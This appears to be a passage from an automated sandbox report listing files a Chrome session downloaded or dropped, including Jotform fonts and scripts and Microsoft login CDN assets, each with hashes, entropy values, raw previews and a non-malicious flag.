                                                                                                                                                                                                                                            Preview:@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff) format("woff");. font-display: swap;. font-style: normal;. font-weight: 300;.}..@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-ThinItalic.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-ThinItalic.woff) format("woff");. font-display: swap;. font-style: italic;. font-weight: 100;.}..@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BoldItalic.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BoldItalic.woff) format("woff");. font-display: swap;. font-style: italic;. font-weight: 700;.}..@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BlackItalic.woff2) format("woff2"), url(ht
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (29635)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):30019
                                                                                                                                                                                                                                            Entropy (8bit):5.490823569534409
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:0GyhAzmqbPD9bLG3BqOC0sWHZ+eqNhLMAxLQrDsj:dgqOpHK8G
                                                                                                                                                                                                                                            MD5:47729A5B4D98F8419DCE0E722EFBA3CB
                                                                                                                                                                                                                                            SHA1:9196E6B54647DC2AA1A7CEFCE0792A064ECDB42C
                                                                                                                                                                                                                                            SHA-256:6E0F98362FF7025A15CC70BE746EAF288E24605ED18457F5DB353DAFBC002837
                                                                                                                                                                                                                                            SHA-512:C88F1C9EAFE8C4ED35E0238DB68B283F822BAD7AC1850CC16CC214FD033A75C9F8660AB53939CFCE2C7BF51FCDF66C147CD456AF8A8CFBD3E29A9E165613880B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab166835-5ee3-50e2-9332-508e88711b24")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["6532"],{3863:function(e,i,n){n.r(i),n.d(i,{default:function(){return _e}});var t={};n.r(t),n.d(t,{Audio:function(){return ee},Image:function(){return Z},PDF:function(){return he},Tiff:function(){return $},Unsupported:function(){return Y},Video:function(){return ne}});var o,s=n("94653"),r=n("37897"),l=n("41663"),a=n("80557"),d=n("32358"),p=n("30234"),c=n("11268"),u=n.n(c),h=n("96724"),m=n.n(h),f=n("40991"),w=n("91715"),g=n("9729"),v=n("68664"),x=n("57665"),C=n("26925"),b=n("62606"),j=n("88412"),y=n("472"),U=n.n(y);function N(){return N=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.l
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):673
                                                                                                                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/images/2_bc3d32a696895f78c19d.svg
                                                                                                                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (10521)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):10892
                                                                                                                                                                                                                                            Entropy (8bit):5.220052012475609
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:WTDUvhlrY+kkzNJHdPphtyYZcr5PTVVPnuHUzb0d3hC:qUvhm+VlPphkkKVVPnfzwd3hC
                                                                                                                                                                                                                                            MD5:EF7D0DAF7C7D4A4DEBBC94603BE8497A
                                                                                                                                                                                                                                            SHA1:22B9BA8FD096241CB04DEF04691C312B77EFA34E
                                                                                                                                                                                                                                            SHA-256:DA7282E363D0D6F1276C27096833E904EFAFBC72E8E90AE75C46EEED997F1DE1
                                                                                                                                                                                                                                            SHA-512:9A3739417A7B266522C4FD3B26E415DFEBD3F707BA9D28F76B471A17FA5AE2B60FB91B2A9ECA82DB555B1D74F3712F5E84D0A0BFE10AF2E613DE8FE72D6EF1DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/5083.cbf741f8.js
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2f0969ff-0b04-510a-8ae3-6687ebde5179")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["5083"],{11577:function(t,e,r){r.d(e,{t7:function(){return y},S_:function(){return M}});var n=r("90946"),o=r("62568"),i=r("1589"),a=function(t,e){return t===e};var l=function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:a,r=void 0,n=[],o=void 0,i=!1,l=function(t,r){return e(t,n[r])};return function(){for(var e=arguments.length,a=Array(e),s=0;s<e;s++)a[s]=arguments[s];return i&&r===this&&a.length===n.length&&a.every(l)?o:(i=!0,r=this,n=a,o=t.apply(this,a))}},s=r("37897"),c="object"==typeof performance&&"function"==typeof performance.now?function(){return performance.now()}:function(){retur
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65199)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1618634
                                                                                                                                                                                                                                            Entropy (8bit):5.369330305473696
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:fAhs5h9XcuFSJXGS+0weVXdeOgBU4MjNemACIFJjSKDjkWtmm/x2EBsPPGFPvl2M:f0seo0weXdeZIemIl7J
                                                                                                                                                                                                                                            MD5:E12C5F031D037522ABC840E972F9A822
                                                                                                                                                                                                                                            SHA1:A1BD50FC39A418ABE2E563A3F2E0F1A75448D3B1
                                                                                                                                                                                                                                            SHA-256:7314282DB782A71F3A111BA6161CEB589CADF3331E7EC4AD54BD8D83E3678C0D
                                                                                                                                                                                                                                            SHA-512:C517ACB4BEB8EC2C0AC5DF3AE0F5DFC4D42216B93A5C252401C25BB994105680C70C2CB5B7043541B5638F4D030691EFA1C7B4A60D015F9572896BB414BAE253
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:/*! For license information please see 8953.7f4b13b0.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e61ab359-3f15-5dad-a80f-f88e3e676a65")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["8953"],{16008:function(e,t,n){"use strict";n.d(t,{B:function(){return l},Hr:function(){return u},IG:function(){return f},S1:function(){return h},dk:function(){return m},ur:function(){return p},yV:function(){return c},y_:function(){return d}});var r,o,i=function(){return window[window._fs_namespace]},a=function(){!function(){if(!i())throw Error("FullStory is not loaded, please ensure the init function is invoked before calling FullStory API functions")}();for(var e=arguments.length,t=new Array(e),n=0;n<e;n++)t[n]=arguments[n];return t.every((function
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 58433
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15125
                                                                                                                                                                                                                                            Entropy (8bit):7.986030066929702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qab+ZhcazgYZeTpvoGyxC5S+W18Lbucsp55ZVaaJPBKm1GYFA9S/xuer0Jwx3ew6:qvJeV8c8+hsrVxJPbGiAs/c40JwdvoR
                                                                                                                                                                                                                                            MD5:3F267BE29D56D90028928760092A1260
                                                                                                                                                                                                                                            SHA1:7662FC982E8B2EF4551DB0DAFD44E21209A2C515
                                                                                                                                                                                                                                            SHA-256:D4691B8E14E7BD02DCE3CCAFFCF390AC4BFD533A717532D173B4343D78C910F6
                                                                                                                                                                                                                                            SHA-512:0C8B2B81BBD7531977E91E63DB6F49CF0B35B63531658038D335F92A509CA07D716441441DA17DF585672C7854908DA2DB333FC000E254FD0602FA27E4A76459
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........}ks.H.....$.....Rj..4.u[v.c..n.t......1.p..../3.*.@......h..........2O..7...^.o..6^|z~]...6E..i..w.ERT..GG...f.`...k.6...9.?....pU..2.R......z...%....^.yU..$.K...w[..z..6..z0.3.4LJ..e..w;>..._.7.$+.....<..IA.>.v;?..NP.>.r^Vy.%=.Gz.E.e....D........n..0..>P.."^...a.N....=...Od.J...0\d)4S-....t..2L..../o.-....\.W..C[......W..&..E....i.1.............|.o.|.L.....a..O.{.{.. VB.../.6.<7.2\......aD>...d.h.....~"*./...."..F....2Ky...C.4f7..!..''...q.....:.n{|.Va......~.>...,..W).,{qY...YO...Y.../.....t........K.c.K.SY....d....m...].7...Z...../.........UQ...Q.\C.H...}.6..4.x....... .pb......G....2...v..Z..E...x.O~..e....e...@.=..W...{_.Q.~<...P...&+..X-#.G8/b.."J.....$.g.<..G.)..%(..<..2....lY.....Z.....B...,Oy.b.q.D%,..K....]...YZ.P_.J.....L/x./._f9f.n2@...v......Y..M....!..M......f9..,.3.@...Q.gP.&.AT.....D... .)....(..Pq..~........_..s4.......4.U...I%..*.._.........F.b.......#.\.i.V.....U.QL..3`..lQ...d.l....911[!U.A......03
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):20410
                                                                                                                                                                                                                                            Entropy (8bit):7.980582012022051
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                                                                                                                                                                            MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                                                                                                                                                            SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                                                                                                                                                            SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                                                                                                                                                            SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                                                                                                                                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2672
                                                                                                                                                                                                                                            Entropy (8bit):6.640973516071413
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                                                                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 74703, version 3.0
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):74703
                                                                                                                                                                                                                                            Entropy (8bit):7.996549296180461
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:bTIFxoNPuUzQGL8i6NnvdrFhNA5bzF8eoKiXPNS5ZNSxiTTqD9E+u7v9OJu:bT4+Y2oLh25bB8eeXOjSxTZEl
                                                                                                                                                                                                                                            MD5:A9C3E34A0C3BE1FFEA1EF29AFE67F947
                                                                                                                                                                                                                                            SHA1:B0E4B24186B9B20353B54B0C241F020385837051
                                                                                                                                                                                                                                            SHA-256:FF7495D22E68DB3DB45DE276011A012B816220F40A84101B268F99ED8BD26114
                                                                                                                                                                                                                                            SHA-512:AFAF3AC9082C64C3D6A2D2AABF3FD1C72A4536084728B1C3B8918E6922F693E863A6403AE78560B2A7B0D333C447E9470911AD7ED79CE989B7B22C35BAB2F58B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff2
                                                                                                                                                                                                                                            Preview:wOF2......#........X..!.......!.......................h..w.`....b..s.....4......8.6.$..L..P.. ........A[+u.......kY.b:.....U...?..6.x].6..>._.f...6.x+.7.u.5............}.Bd......-..V.D..N...D4.vwq..7mQ.ZS..K.m6...2......e....#.<J....6...-lr.'...:u.|t.U...6..Z...-x.urd.....z...Z..h5G...Y.nd._T..BHBJ.r..\T.#c.....9.q..Zr..h..z5H..M.y...:..F.t.0@...P.g\...^...._;.[..{..Z.pJ.]>...4I.....-..a@..{.Z.@O..6..T]..$$.......{...~}K..YZ.'Gx(..."D."n~..t..h.{j.R.L.....Q...#.......g)....D.4.X..#..h.yE7.w+..|..5.S.(="..A.k..........'......*..[..L...H......Qu...\..4.3...q..d..%..EN.\...fU...Idf..s.gA....U....Hm.{....&$.#^......cs....."....b..E.p...<.....c.]u...A0."F.1........z?..clM,`..6....1.B[.H1.(N..;...0.'.......!"..T.....`..1.sS:..7.m._b..&...D..O...a*.......*..9c..u......MAK.MdZ(|...!y2,..>..4!j....&9.y.."Y$5bkb...FD9RA.....12...F..,.....9.?[.iYc9V......q .}.{*.sM.&X.8..E>..... ..c...gkVP..XH..o....T...nR...........R.ex...?..}...i.l. H.YI5....p..l.8.lb78H..*.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1167
                                                                                                                                                                                                                                            Entropy (8bit):7.327644603639709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:27/689luRphtvMFk3hU6MP1V8ZrBBQFBL+Qz:27/689oR53h3rZrz2BL+w
                                                                                                                                                                                                                                            MD5:E8EBDF41A41790CF73E2A2EBB6FFE690
                                                                                                                                                                                                                                            SHA1:49127A11E99193A7A3A4DA08CADCDE291F67A871
                                                                                                                                                                                                                                            SHA-256:BE1B127A8314B29D436303456CE25D28DCAA6922EDB488D5B2EA5DAD079049FE
                                                                                                                                                                                                                                            SHA-512:431DC2BC4FB339468FFEF2B1F3D98BE0868C5726DB21832B05A93AEB8C5515D46DF3EDBA5FCC3597C846BBD7727E0CE77AA5DB9E27AC6B2C69E4848928442681
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32
                                                                                                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .........._....IDATx...s.G...yh.,.zY.,R..s...R..q..S.rKU......HN@.K..qd.".;... .q*....A}....o.{~....9..g....`....v.:.v....Z...`..v.\...BLGkg.......?.U.>==cb...b.%...@...B.i.$!....\.8Fi.MS.4E+..v..$d..(......;#.J....I.e7?....k....e..!.Q...)R.......BP(....t.]J.2....qX^^f<....P,...8;{C...|8$.C..h..=.wi.....8.b.8...i6.(.(W+T.567.8..y.....:.B.[[.H.....?..#..v..rgw.~.G....G.a.....Z.....{.a...b.A...9.t...K.G.~..^.O..%_,.q...B..h...=..#:........).....)%Q.Q.T...4..x...l.6....R....M..V......^[{..j..>..#|.......e...}...n.Y]-....R.D..j../9...Z.(....<...l6......G..<9..\.G..a0. 6..6...o.i.^5..-RJ..!.B.$!M...".1`-B.,P*....Xo6.....G.T.q....c..r .R.. `8..]..L&(..Z_%.~..0B)...)\.1d.f2...w....$...'1/..`gg..q(W*....h....P\]..k...[..{.......
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6376
                                                                                                                                                                                                                                            Entropy (8bit):5.422774271094704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:umIMhfs7bgKIjC4mxOZB/Gv8kURyciQc4vk/vXdLq97DMlmDeM8423TvN0G+O2Ft:aMe7UDu4mxOD/7nycFuHXwtmmCMZyM1
                                                                                                                                                                                                                                            MD5:EBC9F7B2083E930685A7BD68E8A9B982
                                                                                                                                                                                                                                            SHA1:1E6AB75B5C148463880615D9817CF5AD21A2CF87
                                                                                                                                                                                                                                            SHA-256:D74F3CA658E149F3E233094CAC69E619F6F544A13A291B96BBB28E62191C3CB2
                                                                                                                                                                                                                                            SHA-512:8E478F94822EFE60D04BD047C0234FF3EE97F85DB442D8CAE600E3EB1980430DC364FC358EF06D8420E1A43D567E0CBE508C12ECA06D0B6283D9AF5DF09D1CB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:function S(n){var r=0;return function(){return r<n.length?{done:!1,value:n[r++]}:{done:!0}}}function T(n){var r="undefined"!=typeof Symbol&&Symbol.iterator&&n[Symbol.iterator];return r?r.call(n):{next:S(n)}}function U(n){for(var r,y=[];!(r=n.next()).done;)y.push(r.value);return y}.(function(){function n(a,b){a="__pwacompat_"+a;void 0!==b&&(z[a]=b);return z[a]}function r(){var a=(A=document.head.querySelector('link[rel="manifest"]'))?A.href:"";if(!a)throw'can\'t find <link rel="manifest" href=".." />\'';var b=y([a,window.location]),e=n("manifest");if(e)try{var g=JSON.parse(e);H(g,b)}catch(u){console.warn("PWACompat error",u)}else{var p=new XMLHttpRequest;p.open("GET",a);p.withCredentials="use-credentials"===A.getAttribute("crossorigin");p.onload=function(){try{var u=JSON.parse(p.responseText);.n("manifest",p.responseText);H(u,b)}catch(v){console.warn("PWACompat error",v)}};p.send(null)}}function y(a){for(var b={},e=0;e<a.length;b={c:b.c},++e){b.c=a[e];try{return new URL("",b.c),function
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5525
                                                                                                                                                                                                                                            Entropy (8bit):7.961202222662501
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                                                                                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                                                                                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                                                                                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                                                                                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 71876, version 3.0
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):71876
                                                                                                                                                                                                                                            Entropy (8bit):7.9965405338255335
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:JN5hadhokWENypUDbGFevek6mm/1ksdRtaEgOEK5H1J:JN5hadhtBy+bQTk6m3o3g8
                                                                                                                                                                                                                                            MD5:B35B52EC5CCBEBF7AD2EFDB948B7A532
                                                                                                                                                                                                                                            SHA1:3A5655FE13DDC3763F1D3515895FA8E715C1C8D5
                                                                                                                                                                                                                                            SHA-256:2D463E335A26C491CBB6803EE61BCB4E254DE5053D937182B7AF54321988AA24
                                                                                                                                                                                                                                            SHA-512:95CD71C7CA8FAD73D9590AEAB9F2722A67EEBD590F598459C186AC0B4E6F0EFD1F181C6B2A8A2EB7C43CB285A8EA105BF13579F152BD9B6E4E35C292BEEA0F5A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff2
